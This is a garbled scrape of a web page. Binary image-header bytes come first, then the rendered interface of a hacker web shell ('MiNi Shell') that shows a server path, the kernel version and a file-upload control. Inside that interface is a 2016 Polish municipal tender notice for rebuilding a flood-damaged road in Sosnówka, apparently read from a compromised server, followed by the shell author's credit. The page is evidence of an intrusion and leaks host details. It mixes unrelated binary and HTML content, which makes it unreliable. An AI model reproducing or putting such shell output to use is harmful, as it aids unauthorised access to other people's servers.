JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160421/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160421/99818-N-2016.html

<p class="kh_header"><b>Podgórzyn: Odbudowa drogi ulica Czrewona Dolina dz. nr 721/3, 568/80, 721/2, 501/3, 498/4, 723/2,720 w Sosnówce w km 0 + 000 -1 + 391  [intensywne opady deszczu maj, czerwiec 2013 r.]</b><br>
<b>Numer ogłoszenia: 99818 - 2016; data zamieszczenia: 21.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Podgórzyn , ul. Żołnierska 14, 58-562 Podgórzyn, woj. dolnośląskie, tel. 075 7621093, faks 075 7621358.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbudowa drogi ulica Czrewona Dolina dz. nr 721/3, 568/80, 721/2, 501/3, 498/4, 723/2,720 w Sosnówce w km 0 + 000 -1 + 391  [intensywne opady deszczu maj, czerwiec 2013 r.].</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Istniejąca ulica Czerwona Dolina przewidziany do odbudowy polegającej na remoncie nawierzchni i przepustów w śladzie istniejących dróg, zlokalizowana jest na działkach drogowych nr 721/3, 568/80, 721/2, 501/3, 498/4, 723/2, 720 dr w miejscowości Sosnówka na terenie gminy Podgórzyn. Jest to droga usytuowana w terenie zróżnicowanym pod względem wysokości, o nawierzchni ulepszonej o charakterze dojazdowym do zabudowań mieszkalnych i budynków gospodarczych. Przedmiotowa droga jest przedłużeniem ul. Szkolnej i stanowi ulicę Czerwona Dolina i ma status drogi gminnej o numerze 115632D. Podczas powodzi w maju i czerwcu 2013 roku, którym towarzyszyły intensywne opady doszło do znaczących uszkodzeń warstw nawierzchni i przepustów. Uszkodzenia maja charakter powierzchniowych spękań oraz rozmyć nawierzchni utwardzonej sięgających głębszych warstw podbudowy. Obecnie część drogi przebiegająca po płaskim terenie nadaje się do wykorzystania jako podbudowa pod nawierzchnię natomiast nawierzchnie usytuowane na wzniesieniach nie nadają się do wykorzystania jako warstwa podbudowy pod nową nawierzchnię z betonu asfaltowego. Jezdnia posiada zmienną szerokość od 3,00 do 6,35 metra (w miejscu mijanki) i posiada gruntowe pobocza. W przebiegu istniejącego śladu ulicy występują sieci elektroenergetyczne i telekomunikacyjne. Odwodnienie pasa drogowego realizowane jest powierzchniowo poprzez spadki poprzeczne i podłużne jezdni. W stanie obecnym komunikacja tym odcinkiem drogi stwarza zagrożenie dla bezpieczeństwa jej użytkowników. Aby droga nadawała się do normalnej eksploatacji należy niezwłocznie wykonać jej przebudowę, polegającą na odtworzeniu profilu i przekroju, wykonaniu nawierzchni asfaltobetonowych, oraz przywrócenie funkcjonalności odwodnienia powierzchniowego wraz z przepustami.
Parametry projektowanej drogi
Przyjęto kategorię ruchu KR2
Długość drogi			
odcinek A-Aprim - 150,00 m;
odcinek Aprim- B - 536,96 m;
odcinek B - Bprim - 705,04 m;
odcinek C - Cprim - 611,66 m;
Szerokość jezdni od 3,00 m do 6,35 m (średnio 3,2 m)
Powierzchnia jezdni i zjazdów 6168,20 m2 + 443,92 m2 = 6612,12 m2;
Spadki podłużne	od 1 do 8 %;
Spadki poprzeczne do 2 %;
Nawierzchnia beton asfaltowy.
Rozwiązania projektowe
W porozumieniu z Inwestorem, przebudowę drogi polegającą na remoncie nawierzchni i urządzeń odwadniających zaprojektowano tak, aby sytuacyjnie trasę drogi dopasować do istniejących szerokości pasa drogowego oraz wysokościowo do niwelety istniejącej drogi i przyległego terenu. Trasa drogi przebiega w granicach pasa drogowego w śladzie istniejących dróg. Projektowana nawierzchnia będzie wykonana z betonu asfaltowego z uwagi na trwałość, niskie koszty budowy oraz utrzymania. Tak wykonana warstwa ścieralna charakteryzuje się również dużą odpornością na zmienne warunki atmosferyczne jak i środki odladzające.
Konstrukcja jezdni
Na podstawie dokonanych wyliczeń oraz w oparciu o wyniki dokonanych pomiarów sytuacyjno-wysokościowych i oceny geotechnicznej terenu, zaprojektowano następująca konstrukcje jezdni dla kategorii ruchu KR2 dla odcinka drogi B-B1 w km od 1+206,00 do km 1+300, L=96,0 m oraz odcinka    C-Cprim, L=611,66:
wyprofilowane i zagęszczone podłoże po korytowaniu na głębokość ok. 30 cm;
warstwa odsączająca z pospółki grubości 15 cm;
podbudowa zasadnicza dwuwarstwowa z kruszywa łamanego 0/31,5 mm stabilizowanego mechanicznie grubości 15 cm + 10 cm = 25 cm;
warstwa wiążąca z betonu asfaltowego półścisłego AC 16 W 50/70 grubości 7 cm;
skropienie emulsją asfaltową 0,3 kg/m2;
warstwa ścieralna z betonu asfaltowego ścisłego AC 11 S 50/70 grubości 5 cm.
Dla odcinków A-Aprim, L=150,00 oraz Aprim-B, L=536,96 i B-Bprim, L=609,04m zaprojektowano wykonanie nawierzchni na istniejącej po uprzednim wykonaniu remontów cząstkowych w miejscach ubytków i wyłomów nawierzchni. Warstwy do wykonania:
oczyszczenie istniejącej nawierzchni;
skropienie emulsją asfaltową 0,3 kg/m2;
warstwa wiążąca z betonu asfaltowego półścisłego AC 16 W 50/70 grubości 5 cm;
skropienie emulsją asfaltową 0,3 kg/m2;
warstwa ścieralna z betonu asfaltowego ścisłego AC 11 S 50/70 grubości 4 cm.
Zjazdy
Konstrukcje jezdni zjazdów należy przyjąć tożsamo jak dla przyległego odcinka drogi :
wyprofilowane i zagęszczone podłoże po korytowaniu na głębokość ok. 30 cm;
warstwa odsączająca z pospółki grubości 10 cm;
podbudowa zasadnicza dwuwarstwowa z kruszywa łamanego 0/31,5 mm stabilizowanego mechanicznie grubości 15 cm + 8 cm = 23 cm;
warstwa wiążąca z betonu asfaltowego półścisłego AC 16 W 50/70 grubości 5 cm;
skropienie emulsją asfaltową 0,3 kg/m2;
warstwa ścieralna z betonu asfaltowego ścisłego AC 11 S 50/70 grubości 5 cm.
Odwodnienie
W celu prawidłowego odwodnienia nawierzchni jezdni i przyległego terenu zaprojektowano spadki poprzeczne i podłużne drogi tak aby odprowadzić wody opadowe poza korpus drogi, na co zezwala ukształtowanie bezpośredniego sąsiedztwa jezdni  terenem. 
Z uwagi na zły stan techniczny przepustów znajdujących się pod korpusem drogi 
przewidziano ich wymianę na nowe o tych samych parametrach przepływu i technologii 
wykonania. Z konieczności poprawy możliwości spływu wód na odcinku o dużym nachyleniu i w celu zapobieżenia wypłukiwania krawędzi jezdni wykonać należy ściek z kostki kamiennej ograniczony od strony skarpy krawężnikiem betonowym i odprowadzeniem poprzez jezdnię korytem odwodnieniowym liniowym 100x25x16 cm (z polimerobetonu) z rusztem żeliwnym klasy D400. 
Przepusty
km 0+739,00, L=6,0 m
Przepust drogowy skrzynkowy żelbetowy (według dokumentacji CBPBDiM Transprojekt Warszawa  2007). Obciążenia kl. A - beton C45/55, pojazd specjalny Stanag 150. 
Skrzynka o wymiarach zewnętrznych 240x200x99 cm (wew. 200x150 cm). Przepust ułożony na ławie betonowej 7,0x3,0 z betonu klasy C 16/20 B-20 grubości 25 cm. Elementy skrzynkowe zaizolowane, w miejscach połączeń elementów uszczelnione papą termozgrzewalną mostową pasami szer. 30 cm na obwodzie elementu żelbetowego. Elementy żelbetowe zwieńczone płytą żelbetową ze zbrojeniem prętami średnicy 12 mm o siatce 150x150 mm. Płyta 6,5x4,0m o grubości 20 cm z betonu C20/25, B25. Całość płyty pokryta papą termozgrzewalną. Do płyty zamontowane za pomocą marek balustrady P1.
km 0+907,30, L=6,0 m
Przepust wykonać z rur żelbetowych o średnicy wew. 1500 mm i łącznej długości 6,0m.  Rury ułożyć na ławie betonowej o szerokości 2,0 m i długości 6,0. Grubość ławy betonowej z betonu klasy C 16/20 B-20 - 25 cm. Przepust zakończyć ściankami czołowymi z kamienia łamanego granitowego.
km 1+111,00, L=6,0 m
Przepust wykonać z rur żelbetowych o średnicy wew. 500 mm i łącznej długości 6,0m.  Rury ułożyć na ławie betonowej o szerokości 0,80 m i długości 6,0. Grubość ławy betonowej z betonu klasy C 16/20 B-20 - 25 cm. Przepust zakończyć ściankami czołowymi z kamienia łamanego granitowego.
km 1+135,87, 
km 1+171,27
 Przepust drogowy wykonany na murze regulacyjnym w postaci płyty żelbetowej o grubości 20 cm z betonu C20/25. Płyta zbrojona prętami średnicy 12 mm o siatce 150x150 mm. Całość płyty pokryta papą termozgrzewalną.
Mury oporowe regulacyjne
Remont murów oporowych w km 1+134,55 ÷ 1+181,58  na zbliżeniach do drogi. Mur posadowić na fundamencie betonowym o wymiarach 0,6x0,3 m. Mur kamienny o szerokości podstawy 0,6m i 0,4 w koronie i wysokości do 1,20 m. Nachylenie skarpy odwodnej 5:1, długość murów ok. 44,20 m. W korpusie muru zastosować od strony rogi sączki PCV O 7,5 cm, ułożone w rzędzie co 1,5 m. Spoina betonowa płaska, cofnięta w głąb muru 5-10 mm, grubości 2-3 cm.
Pobocza
mechaniczne plantowanie poboczy wykonać po przeprowadzeniu robót związanych z wykonaniem koryta i profilowaniem podłoża na odcinku poddanym wymianie podbudowy i nawierzchni;
wyprofilowanie i wzmocnienie materiałem kamiennym poboczy - średnia grubość 10-15 cm i szerokość 0,30 do 0,5 m ze spadkiem 5 % od jezdni ( dla zjazdów do 3%);
powierzchniowe utrwalenie poboczy asfaltem w ilości 8 dm3/m2 z posypaniem grysem   
bazaltowym frakcji 4-8 mm;
Oznakowanie
W związku z występowaniem oznakowania, które znajduje się w złym stanie technicznym wynika potrzeba wymiany oznakowania na nowe.
Urządzenia obce
W związku z istniejącą siecią elektroenergetyczna i telekomunikacyjną na odcinku w km 0+739 należy zabezpieczyć linię kablową rurami dwudzielnymi o długości 6,0m i średnicy 160 mm. 
Roboty rozbiórkowe 
Korytowanie na odcinku objętym wymianą podbudowy i nawierzchni, 
występowania przepustów, 
występowania krawężników i ścieków
występowania zjazdów
Rozbiórki
rozbiórki przepustów,
ścianek przepustów, murów podtrzymujących drogę na styku z potokiem,
Inne
może wystąpić potrzeba usunięcia drobnych zakrzewień i zakrzaczeń wchodzących w skrajnię drogi..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.00-0, 45.23.10.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Kwota wadium wynosi 10000,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiący dokona oceny tego warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy dokona oceny tego warunku na podstawie wykazanych przez oferentów dokumentów stwierdzajacych wykonaie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie najmniej dwie roboty budowlane o zakresie i charakterze porównywalnym z niniejszym zamówieniem, tzn. roboty o wartości powyżej 500.000 zł brutto każda, w zakresie remontu, budowy, odbudowy lub przebudowy drogi o nawierzchni asfaltowej; 
oraz na podstawie załączonych dowodów określających, że roboty te zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny tego warunku na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny tego warunku na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny tego warunku na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca ma obowiązek wskazać w wykazie roboty wykonane w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie najmniej dwie roboty budowlane o zakresie i charakterze porównywalnym z niniejszym zamówieniem, tzn. roboty o wartości powyżej 500.000 zł brutto każda, w zakresie remontu, budowy, odbudowy lub przebudowy drogi o nawierzchni asfaltowej; 
oraz na podstawie załączonych dowodów określających, że roboty te zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://podgorzyn.bip.net.pl/?a=1011<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://podgorzyn.bip.net.pl/?a=1011.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2016 godzina 09:30, miejsce: Urząd Gminy Podgórzyn, ul Żołnierska 14, 58-562 Podgórzyn, pokój nr 6. Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com